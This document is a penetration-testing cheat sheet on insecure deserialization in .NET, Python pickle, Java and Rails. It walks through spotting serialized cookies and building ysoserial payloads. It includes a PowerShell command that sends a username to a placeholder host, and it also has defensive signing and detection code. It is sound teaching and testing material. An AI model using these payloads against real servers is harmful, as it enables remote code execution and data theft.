Insecure Deserialization
Theory
Serialization translates an in-memory object into a form (bytes or text) that can be stored or transmitted across the network; deserialization rebuilds the object from that form.
Practically all mainstream languages support serialization, for example:
Java
PHP
.NET
COM
Ruby
Python
Most other OOP-based languages.
.NET
Top Serialization Methods
Binary Serialization - Runtime serialization
XML & SOAP Serialization
Data Contract Serialization
Binary Serialization
The .NET Framework provides the BinaryFormatter class for binary serialization.
It is the most commonly used serializer in .NET.
BinaryFormatter is a fast, lightweight binary serialization technique.
The BinaryFormatter class serializes and deserializes an object, or an entire graph of connected objects, in binary format.
The System.Runtime.Serialization.Formatters.Binary.BinaryFormatter class has been part of the framework since version 1.0. Microsoft now documents it as unsafe for untrusted input, and it is disabled by default in modern .NET.
Methodology for Identifying the Vulnerability
Identify whether a block of data contains .NET binary serialized data.
Look for the initial signature 'AAEAAAD//////' (the base64-encoded BinaryFormatter header) in data handled by the application, e.g. on login pages.
Exploitation
Tool: ysoserial.net
It takes a user-specified command, wraps it in the chosen gadget chain and serializes the resulting objects to stdout. When an application that has the required gadget types available unsafely deserializes this data, the chain is invoked automatically and the command is executed on the application host.
To exploit the example above: Gadget: TypeConfuseDelegate, Formatter: BinaryFormatter
Generate a payload with ysoserial.net and replace the serialized value in the request to the server.
Payload for code execution:
powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName
Python Pickle Code Injection
Pickle is a Python library for serializing and deserializing objects.
It lets a developer turn an object into a byte string and a byte string back into an object.
The vulnerability arises when the user controls the data that is deserialized.
Applications use object serialization to simplify storage. If an application needs to store an instance of a class, it can serialize it to obtain a string representation of the object; when it needs the instance again, it unserializes the string to get it back.
You can gain code execution if you control a string that is unserialized with Pickle.
Identify
Base64-decode all cookie values. Enable all functionality first (e.g. "Remember me" at login).
Look for something similar to the code below.
Generate Exploit
Run the generator and Base64-encode its output.
python Pickle.py
Online Python interpreter:
https://www.tutorialspoint.com/execute_python_online.php
Replace the cookie with the exploit
You may need to delete the other cookies (for example, if the Rememberme cookie is the vulnerable one).
Reload the page; the code is executed if the application is vulnerable, even if the response is HTTP 500.
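The defensive counterpart of the Rememberme-cookie case above, as an added example that is not part of the original page: the cookie is HMAC-signed so a modified value never reaches pickle at all, and whatever does get unpickled goes through a restricted loader that refuses to resolve any global outside an allowlist. The secret key, the cookie layout and the allowlist contents are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import io
import pickle

# Assumed server-side secret for this example; a real app loads it from config.
SECRET_KEY = b"constructed-example-key-do-not-reuse"

# The only (module, name) pairs a cookie pickle may reference by name. Plain
# dicts, lists and strings are written as opcodes and never consult this list;
# anything looked up by name (classes, functions) is refused unless listed.
ALLOWED_GLOBALS = {("datetime", "datetime")}


class RestrictedUnpickler(pickle.Unpickler):
    """Blocks find_class for unlisted globals, so a crafted stream cannot
    import and invoke arbitrary callables while it is being loaded."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def make_cookie(session) -> str:
    """Serialize and sign: base64(pickle) + '.' + hex(HMAC-SHA256(base64))."""
    body = base64.b64encode(pickle.dumps(session, protocol=4))
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()
    return (body + b"." + tag).decode()


def load_cookie(cookie: str):
    """Verify the signature before any unpickling, then load through the
    restricted loader. Returns the session object, or None on any failure."""
    try:
        body, tag = cookie.encode().rsplit(b".", 1)
    except ValueError:
        return None
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        return None  # forged or tampered: pickle is never reached
    try:
        return RestrictedUnpickler(io.BytesIO(base64.b64decode(body))).load()
    except (pickle.UnpicklingError, ValueError):
        return None
```

The signature check is the primary control; the restricted loader is defence in depth in case the key ever leaks.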
XMLDecoder
XMLDecoder is a Java class that creates objects from an XML message. If a malicious user can get an application to use arbitrary data in a call to the readObject method, she will instantly gain code execution on the server. Code execution is gained when an application uses XMLDecoder to parse XML and create an object from the XML message. Unserializing user-controlled data is never a good idea and should be avoided.
Exploitation
Check the responses for any usage of the XMLDecoder class.
Reference: PentesterLab exercise
In this exercise, the web app accepts and processes an XML file.
XStream vulnerability [Jenkins: CVE-2016-0792]
XStream is a popular deserialization library. It is used directly by many popular apps, such as the build tool Jenkins. By sending the payload below, Jenkins will unserialize the data provided and allow an attacker to gain code execution. Reference: https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream
The payload illustrated here relies on Groovy.
Tip
Change the parameter
name=<change here for each request>
ObjectInputStream using readObject()
The root cause of this issue is that the application calls readObject()
on data coming from the user. You get code execution if an application uses readObject()
on untrusted input and contains a "vulnerable" library, i.e. one that provides a usable gadget chain.
Pre-requisites
Entry point: a call to the method readObject() on untrusted input.
Libraries that contain vulnerable gadgets (e.g. Spring).
Exploitation
Tool: ysoserial
Burp Extension JavaSerialKiller.
Inspect whether the authentication cookie starts with the pattern below. If it does, this is a good indicator that the application uses a base64-encoded Java serialized object.
Create a malicious serialized object with ysoserial, choosing a payload (gadget chain) and a <command>. Try all the payloads if you are not sure which one applies.
java -jar ysoserial.jar Spring1 '<insert command>' | base64
Base64-encode the output (the pipe above already does this), replace the cookie with this value and replay the request. The code is executed.
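The identification steps of the .NET, Pickle and Java sections above all amount to the same check: decode the value and look at its leading bytes. As an added example that is not part of the original page, and generalising those three checks into one scanner, the Python below decodes each cookie of a request and matches the well-known headers of a BinaryFormatter stream (the base64 'AAEAAAD' prefix noted earlier), a Java object stream (AC ED 00 05, base64 'rO0AB') and a pickle protocol header. The sample cookie header is constructed for the example.

```python
import base64
import pickle
from urllib.parse import unquote

# Well-known leading bytes: BinaryFormatter header record (root id 1,
# header id -1) and the Java ObjectOutputStream stream magic + version.
SIGNATURES = [
    (b"\x00\x01\x00\x00\x00\xff\xff\xff\xff", ".NET BinaryFormatter"),
    (b"\xac\xed\x00\x05", "Java ObjectInputStream"),
]


def decode_cookie_value(value: str):
    """Decode a possibly URL-encoded, standard or URL-safe base64 value,
    padded or not; returns None when it is not valid base64."""
    text = unquote(value.strip().strip('"')).replace("-", "+").replace("_", "/")
    try:
        return base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify_blob(data: bytes):
    """Name the serialization format a decoded blob appears to use, or None."""
    for magic, label in SIGNATURES:
        if data.startswith(magic):
            return label
    # Pickle protocols 2-5 open with the PROTO opcode (0x80) and the version;
    # protocols 0 and 1 are text-like and are not covered by this heuristic.
    if len(data) > 1 and data[0] == 0x80 and 2 <= data[1] <= 5:
        return "Python pickle"
    return None


def scan_cookies(cookie_header: str) -> dict:
    """Map cookie name -> format label for each cookie whose value decodes
    to a recognised serialized-object stream; other cookies are ignored."""
    findings = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        decoded = decode_cookie_value(value)
        label = classify_blob(decoded) if decoded else None
        if label:
            findings[name] = label
    return findings


# Constructed sample: signature bytes plus filler, a real pickle of a harmless
# dict (URL-safe, unpadded), and two cookies that carry no object stream.
SAMPLE_COOKIE_HEADER = "; ".join([
    "session=" + base64.b64encode(SIGNATURES[0][0] + b"\x01\x00\x00\x00" * 2).decode(),
    "rememberme=" + base64.urlsafe_b64encode(pickle.dumps({"user": "alice"}, 4)).decode().rstrip("="),
    "auth=" + base64.b64encode(SIGNATURES[1][0] + b"sr\x00\x0bConstructed").decode(),
    "theme=dark",
    "prefs=" + base64.b64encode(b'{"lang":"en"}').decode(),
])
```

A hit only tells you that an object stream is present; whether the application deserializes it unsafely still has to be confirmed, and false positives are possible on short values that happen to decode as base64.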
Rails Object Injection [CVE-2013-0156]
PoC exploit: https://gist.github.com/postmodern/4499206
The idea is to create a new action with arbitrary code in it. By default, Rails does not accept pure YAML in a request body, but it accepts XML, which can embed YAML.
The parameter parsing code of Ruby on Rails allows applications to automatically cast values from strings to certain data types. Unfortunately, the type-casting code supported certain conversions that were not suitable for user-provided data, including creating Symbols and parsing YAML. These unsuitable conversions can be used by an attacker to compromise a Rails application.